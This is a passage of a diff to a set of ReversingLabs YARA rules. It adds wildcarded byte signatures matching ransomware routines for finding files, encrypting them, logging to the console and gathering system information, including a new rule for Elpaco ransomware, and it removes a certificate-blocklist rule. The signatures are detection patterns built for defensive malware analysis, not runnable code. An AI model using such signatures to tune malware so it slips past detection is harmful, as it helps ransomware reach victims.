+            85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68
+            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? C3
+        }
+		$find_files_2 = {
+            55 8B EC 81 C4 ?? ?? ?? ?? 53 56 33 DB 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 4D ??
+            89 55 ?? 89 45 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ??
+            ?? ?? 8D B5 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 E8 ?? ?? ?? ?? 89
+            C3 BB ?? ?? ?? ?? 56 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 4B 75 ?? 33 DB 8D 45 ?? 33 C9 BA
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 8A 14 1E 88 54 05 ?? 40 43 80 3C 1E ?? 74 ?? 83 F8
+            ?? 7E ?? 43 8D 85 ?? ?? ?? ?? 8D 55 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ??
+            ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74 ?? 8B 45 ?? 50 8D 85 ?? ?? ?? ?? 8D 55 ?? B9 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? E8 ?? ?? ?? ?? 80 7C 1E
+            ?? ?? 75 ?? 80 3C 1E ?? 74 ?? 81 FB ?? ?? ?? ?? 0F 8E ?? ?? ?? ?? 33 C0 5A 59 59 64
+            89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ??
+            ?? ?? ?? E8 ?? ?? ?? ?? C3
+        }
+		$encrypt_files_p1 = {
+            55 8B EC 81 C4 ?? ?? ?? ?? 53 56 33 DB 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ??
+            ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 8B D9 89 55 ?? 89 45 ?? 8B 45 ?? E8 ??
+            ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8D
+            85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64
+            89 20 8B 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? 80 7C 02 ?? ?? 75 ?? 8B 45 ?? E8 ?? ?? ?? ??
+            8B D0 4A 8D 45 ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 8D 85 ?? ?? ?? ??
+            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B D0 83 CA ?? 3B D0 75 ?? 80
+            FB ?? 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ??
+            ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? 50
+            8B 45 ?? 50 FF 75 ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B CB 8B 55 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? FF
+        }
+		$encrypt_files_p2 = {
+            75 ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 8B 85 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B B5 ?? ?? ??
+            ?? 8B C6 83 C8 ?? 3B C6 75 ?? 80 FB ?? 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74 ?? 8B
+            45 ?? 50 8B 45 ?? 50 FF 75 ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B CB 8B 55 ?? E8 ?? ?? ?? ?? EB ?? FF
+            75 ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 8B 85 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10
+            68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B
+            15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ??
+            ?? ?? ?? E8 ?? ?? ?? ?? C3
+        }
+		$main_routine = {
+            8D 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55
+            ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? B0 ?? E8 ??
+            ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? B2 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 50 8D 55 ?? 66
+            B8 ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? B1 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 15 ?? ?? ?? ??
+            A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 35
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ??
+            8B 45 ?? 8D 55 ?? E8 ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 8B
+            0D ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B C6 8B 08 FF 51 ?? 8D 55 ??
+            33 C0 E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B C6 8B 08 FF
+            51
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "UNITEKH-S, OOO" and pe.signatures [ i ] . serial == "62:20:53:61:a7:58:b0:05:72:d4:17:cb:a0:14:f0:07" and 1590470683 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $main_routine ) and ( all of ( $find_files_* ) ) and ( all of ( $encrypt_files_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_4B47D18Dbea57Abd1563Ddf89F87A6C2 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Elpaco : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Elpaco ransomware."
 		author = "ReversingLabs"
-		id = "689c1f80-3b3c-5bd7-9129-4f508cad7fb4"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "eb3a6293-f10c-55c4-960a-339e1e7922fe"
+		date = "2025-02-27"
+		modified = "2025-02-27"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4160-L4176"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Elpaco.yara#L1-L316"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "2e464f4e9bfe0c9510a78552acffb241d2435ea9bf3f5f2501353d7f8f280d78"
+		logic_hash = "6b3fdd586c9f3e5c40782c814b5091b28e88f3d74032c392a6479182eb74327a"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Elpaco"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files_p1 = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
+            33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 89 8D ?? ??
+            ?? ?? 0F 57 C0 C7 45 ?? ?? ?? ?? ?? 6A ?? 66 0F 13 45 ?? 6A ?? C7 85 ?? ?? ?? ?? ??
+            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 89 75 ?? 6A
+            ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8B C8 83 C4 ?? 33 C0 89 8D ?? ?? ?? ?? C7 41 ?? ?? ??
+            ?? ?? C7 41 ?? ?? ?? ?? ?? 66 89 01 8D 45 ?? 3B C8 74 ?? 83 7D ?? ?? FF 75 ?? 0F 43
+            45 ?? 50 E8 ?? ?? ?? ?? 8B 7E ?? 8D 85 ?? ?? ?? ?? 50 57 56 E8 ?? ?? ?? ?? 8B 55 ??
+            B9 ?? ?? ?? ?? 2B CA 83 F9 ?? 0F 82 ?? ?? ?? ?? 8B 5D ?? 83 C2 ?? 89 46 ?? 89 55 ??
+            89 07 0F 84 ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 8B F2 8B 03 8D 4D ?? 8B 40 ?? 50 89 85 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8D 45 ?? 8B CC 50 E8 ?? ?? ?? ?? 8D 4D
+            ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B BD ?? ?? ?? ?? B8 ?? ?? ?? ?? 47 C6 45 ?? ?? F7 E7 8B
+            CF 89 BD ?? ?? ?? ?? C1 EA ?? 6B C2 ?? 2B C8 75 ?? 57 39 8D ?? ?? ?? ?? 75 ?? 68 ??
+            ?? ?? ?? EB ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 8D 8D ?? ?? ?? ??
+            8D 45 ?? 0F 43 45 ?? 51 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ??
+            ?? ?? FF 15 ?? ?? ?? ?? 83 7D ?? ?? 8D 4D ?? 8B BD ?? ?? ?? ?? 0F 43 4D ?? 50 51 68
+            ?? ?? ?? ?? 89 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 BF ?? ?? ?? ?? ?? 75 ?? 83
+        }
+		$find_files_p2 = {
+            7D ?? ?? 8D 4D ?? 0F 43 4D ?? E8 ?? ?? ?? ?? 84 C0 74 ?? 83 7D ?? ?? 8D 8D ?? ?? ??
+            ?? 8D 45 ?? 0F 43 45 ?? 51 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 F8 ?? 0F 85 ??
+            ?? ?? ?? 8B BD ?? ?? ?? ?? 85 FF 74 ?? 8B 4F ?? 83 F9 ?? 72 ?? 8B 07 8D 0C 4D ?? ??
+            ?? ?? 81 F9 ?? ?? ?? ?? 72 ?? 8B 50 ?? 83 C1 ?? 2B C2 83 C0 ?? 83 F8 ?? 0F 87 ?? ??
+            ?? ?? 8B C2 51 50 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 47 ?? ?? ?? ?? ?? 6A ?? C7 47 ??
+            ?? ?? ?? ?? 57 66 89 07 E8 ?? ?? ?? ?? 83 C4 ?? 8B 13 4E 6A ?? 52 89 75 ?? 8B 4A ??
+            8B 02 89 01 8B 0A 8B 42 ?? 89 41 ?? E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8B BD ??
+            ?? ?? ?? 8B 35 ?? ?? ?? ?? 0F 1F 00 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D6 85 C0
+            0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ??
+            8B 85 ?? ?? ?? ?? A9 ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 80 3D ?? ?? ?? ?? ?? 0F 85 ?? ??
+            ?? ?? A8 ?? 0F 84 ?? ?? ?? ?? 83 EC ?? 8D 8D ?? ?? ?? ?? 8B D4 89 A5 ?? ?? ?? ?? 33
+            C0 8D 71 ?? C7 42 ?? ?? ?? ?? ?? C7 42 ?? ?? ?? ?? ?? 66 89 02 0F 1F 80 ?? ?? ?? ??
+            66 8B 01 83 C1 ?? 66 85 C0 75 ?? 2B CE 8D 85 ?? ?? ?? ?? D1 F9 51 50 8B CA E8 ?? ??
+            ?? ?? 83 EC ?? C6 45 ?? ?? 8D 45 ?? 8B CC 50 E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8
+            ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 80 BF ?? ?? ?? ?? ?? 75 ?? 8B 3D ?? ?? ?? ?? 8D 5D
+            ?? 83 7D ?? ?? 0F 43 5D ?? 8B 37 3B F7 74 ?? 83 7E ?? ?? 8D 46 ?? 72 ?? 8B 00 50 53
+            FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 36 3B F7 75 ?? 8B 9D ?? ?? ?? ?? 6A ??
+            E8 ?? ?? ?? ?? 8B C8 83 C4 ?? 33 C0 89 8D ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ??
+            ?? ?? ?? ?? 66 89 01 8D 45 ?? 3B C8 74 ?? 83 7D ?? ?? FF 75 ?? 0F 43 45 ?? 50 E8 ??
+            ?? ?? ?? 8B 73 ?? 8D 85 ?? ?? ?? ?? 50 56 53 E8 ?? ?? ?? ?? 8B 55 ?? B9
+        }
+		$find_files_p3 = {
+            2B CA 83 F9 ?? 0F 82 ?? ?? ?? ?? 89 43 ?? 42 8B 5D ?? 89 55 ?? 89 06 89 9D ?? ?? ??
+            ?? E9 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? E9 ?? ?? ?? ?? 80 BF ?? ?? ?? ?? ?? 75 ?? 8D 8D
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 83 EC ?? 8D 8D ?? ?? ?? ?? 8B D4
+            89 A5 ?? ?? ?? ?? 33 C0 8D 71 ?? C7 42 ?? ?? ?? ?? ?? C7 42 ?? ?? ?? ?? ?? 66 89 02
+            66 8B 01 83 C1 ?? 66 85 C0 75 ?? 2B CE 8D 85 ?? ?? ?? ?? D1 F9 51 50 8B CA E8 ?? ??
+            ?? ?? 83 EC ?? C6 45 ?? ?? 8D 45 ?? 8B CC 50 E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8
+            ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 80 BF ?? ?? ?? ?? ?? 75 ?? 83 EC ?? 8D 45 ?? 8B CC
+            50 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 84 C0 74 ?? 83 EC ?? 8D 45 ?? 8B CC 50 E8
+            ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8B D7 8B CE E8 ?? ?? ?? ?? 83 C4 ?? 3D ?? ?? ?? ?? 7C
+            ?? 85 F6 75 ?? A1 ?? ?? ?? ?? EB ?? 83 FE ?? 75 ?? A1 ?? ?? ?? ?? EB ?? 83 FE ?? 75
+            ?? A1 ?? ?? ?? ?? 6A ?? 50 FF 15 ?? ?? ?? ?? FF 87 ?? ?? ?? ?? C6 45 ?? ?? 8B 55 ??
+            83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ??
+            83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B
+            35 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B BD ?? ??
+            ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 85 F6 74 ?? 8B 4E ?? 83 F9 ?? 72 ??
+            8B 06 8D 0C 4D ?? ?? ?? ?? 81 F9 ?? ?? ?? ?? 72 ?? 8B 50 ?? 83 C1 ?? 2B C2 83 C0 ??
+            83 F8 ?? 0F 87 ?? ?? ?? ?? 8B C2 51 50 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 46 ?? ?? ??
+            ?? ?? 6A ?? C7 46 ?? ?? ?? ?? ?? 56 66 89 06 E8 ?? ?? ?? ?? 83 C4 ?? 8B 13 8B 75 ??
+            6A ?? 4E 8B 4A ?? 8B 02 52 89 75 ?? 89 01 8B 0A 8B 42 ?? 89 41 ?? E8 ?? ?? ?? ?? 83
+        }
+		$find_files_p4 = {
+            C4 ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? C6 45 ?? ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 4D
+            ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0
+            ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 33 C0 8B 55
+            ?? 66 89 45 ?? C7 45 ?? ?? ?? ?? ?? 89 45 ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ??
+            ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87
+            ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 F6 0F 85 ?? ?? ?? ?? 8B 03 89 1B 89 5B
+            ?? 3B C3 74 ?? 8B 30 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B C6 3B F3 75 ?? 6A ?? 53 E8
+            ?? ?? ?? ?? 8B 55 ?? 83 C4 ?? 83 FA ?? 0F 82 ?? ?? ?? ?? 8B 4D ?? 8D 14 55 ?? ?? ??
+            ?? 8B C1 81 FA ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8
+            ?? 0F 87 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ??
+            ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87
+            ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 33 C0 C7 45 ?? ?? ?? ?? ?? C7 45
+            ?? ?? ?? ?? ?? 66 89 45 ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA
+            ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51
+            E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ??
+            8B 03 89 1B 89 5B ?? 3B C3 0F 84 ?? ?? ?? ?? 8B 30 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
+            8B C6 3B F3 75 ?? E9 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 64 89 0D ??
+            ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$write_console_log_p1 = {
+            55 8B EC 83 E4 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ??
+            ?? ?? 53 56 57 B9 ?? ?? ?? ?? BA ?? ?? ?? ?? B8 ?? ?? ?? ?? F0 0F B1 0A 85 C0 0F 84
+            ?? ?? ?? ?? 8B 45 ?? 8D 7C 24 ?? 85 C0 B9 ?? ?? ?? ?? 0F 45 C8 8D 45 ?? 50 33 F6 8B
+            C7 56 51 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 08 FF 70 ?? 83 C9 ?? 51 E8 ?? ?? ?? ??
+            83 C9 ?? 83 C4 ?? 85 C0 0F 48 C1 85 C0 78 ?? 3D ?? ?? ?? ?? 77 ?? 75 ?? EB ?? BE ??
+            ?? ?? ?? 33 C0 66 89 84 24 ?? ?? ?? ?? B8 ?? ?? ?? ?? 8D 44 44 ?? 89 44 24 ?? 85 F6
+            79 ?? 68 ?? ?? ?? ?? 8D 44 24 ?? BA ?? ?? ?? ?? 50 8D 44 24 ?? 50 51 8D 8C 24 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 81 FE ?? ?? ?? ?? 75 ?? 8B 44 24 ?? 8B F8 8D 44 24 ?? 2B F8 83
+            E7 ?? 85 FF 0F 8E ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 0F B7 44 24 ?? 50 0F
+            B7 44 24 ?? 50 0F B7 44 24 ?? 50 8D 44 24 ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83
+            C4 ?? 8B F0 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 85 F6 0F 84 ?? ?? ??
+            ?? 8B 0D ?? ?? ?? ?? F6 C1 ?? 74 ?? 8B 15 ?? ?? ?? ?? 83 FA ?? 74 ?? 6A ?? 8D 44 24
+            ?? 50 8D 04 36 8B 35 ?? ?? ?? ?? 50 8D 44 24 ?? 50 52 FF D6 6A ?? 8D 44 24 ?? 50 57
+            8D 44 24 ?? 50 FF 35 ?? ?? ?? ?? FF D6 6A ?? 8D 44 24 ?? 50 6A ?? 68 ?? ?? ?? ?? FF
+        }
+		$write_console_log_p2 = {
+            35 ?? ?? ?? ?? FF D6 8B 0D ?? ?? ?? ?? F6 C1 ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D
+            84 24 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 50 8D 44 24 ?? 50 68
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ??
+            ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? 50 FF D3 6A ?? 6A ?? 6A ?? 6A ?? 8B D8 8D 84
+            24 ?? ?? ?? ?? 53 50 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F8 85 FF 74 ?? 8D 0C 7D ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 57 8B F0 8D 84 24 ?? ?? ?? ?? 56 53 50 6A ?? 6A ??
+            FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B D6 E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 56 E8
+            ?? ?? ?? ?? 83 C4 ?? 8B 1D ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 3D ?? ??
+            ?? ?? ?? 74 ?? 8D 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 50 FF D3 8D 04 45 ?? ?? ?? ?? 89
+            44 24 ?? 8D 44 24 ?? 89 44 24 ?? 8D 44 24 ?? 50 68 ?? ?? ?? ?? 6A ?? 8D 44 24 ?? 50
+            6A ?? 6A ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 5F 5E 5B 33 CC
+            E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$get_system_information_p1 = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 51 B8 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 65 ?? 68 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50
+            8D 85 ?? ?? ?? ?? 50 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? FF 15 ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ?? BB ?? ?? ?? ?? 39 9D ?? ?? ?? ?? 68 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? 0F 44 C3 6A ?? A2 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ??
+            ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ??
+            ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 80 3D ?? ?? ?? ?? ?? 8B 35 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? 74 ?? 68 ?? ?? ?? ?? EB ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D6
+            B9 ?? ?? ?? ?? 83 C4 ?? 8D 51 ?? 90 66 8B 01 83 C1 ?? 66 85 C0 75 ?? 2B CA D1 F9 51
+            68 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8B CA
+            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 83 C4 ?? 33 C0 66 89 85 ?? ?? ?? ?? 8D 79 ?? 66 8B 01
+            83 C1 ?? 66 85 C0 75 ?? 2B CF D1 F9 51 52 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68
+            ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ??
+            ?? 8D 85 ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 50 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83
+            C4 ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ??
+            50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 0F 1F 84 00
+        }
+		$get_system_information_p2 = {
